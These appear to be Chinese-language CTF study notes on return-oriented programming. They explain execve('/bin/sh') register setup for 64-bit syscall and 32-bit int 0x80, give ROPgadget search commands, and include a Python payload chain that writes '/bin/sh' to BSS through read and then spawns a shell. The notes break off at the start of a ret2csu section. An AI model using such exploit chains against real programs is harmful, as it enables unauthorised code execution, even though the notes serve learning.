123

ROP

原理

在栈缓冲区溢出的基础上，利用程序中已有的小片段（gadgets）来改变某些寄存器或者变量的值，从而控制程序的执行流程

一般gadgets的指令时查找RIP寄存器

syscall

原理：（64位）

syscall
rax 0x3b
rdi "/bin/sh"
rsi  0
rdx  0
syscall_addr

过程：1.首先找到/bin/sh,或者找到sh

​ 2.溢出之后，pop rax rdi rsi rdx

​ 3.找到syscall 的地址（这个要找syscall 后面又retn的）

​ 如果没有/bin/sh的地址

​ 4.先利用syscall 写入/bin/sh\x00

注：不能直接写在栈上，因为栈的位置是随机的

如何写入：

在DATA段写入数据

带align （对齐）的写入完全没有影响

调用read

read(0 写入的地址 写入的长度)

32位

eax 0xb
ebx bin_sh_addr
ecx 0
edx 0
int 0x80

ROP-retsyscall

ROPgadget --binary rop  --only 'pop|ret' | grep 'eax'
ROPgadget --binary rop  --string '/bin/sh'
ROPgadget --binary rop  --only 'int'

注意：这里找到的指令地址后面同样要带有ret

32位 read 是3

payload=b'a'*32+p32(read_addr)+p32(pop_edx_ecx_ebx)
payload+=p32(0)+p32(bss_addr)+p32(8)
payload+=p32(pop_eax)+p32(11)+p32(pop_edx_ecx_ebx)+p32(0)+p32(0)+p32(bss_addr)
payload+=p32(int_80)


payload2=b'/bin/sh\x00'

ret2csu

原理

在汇编中会有这样的一段代码

可以通过这段调用寄存器，在ret的时候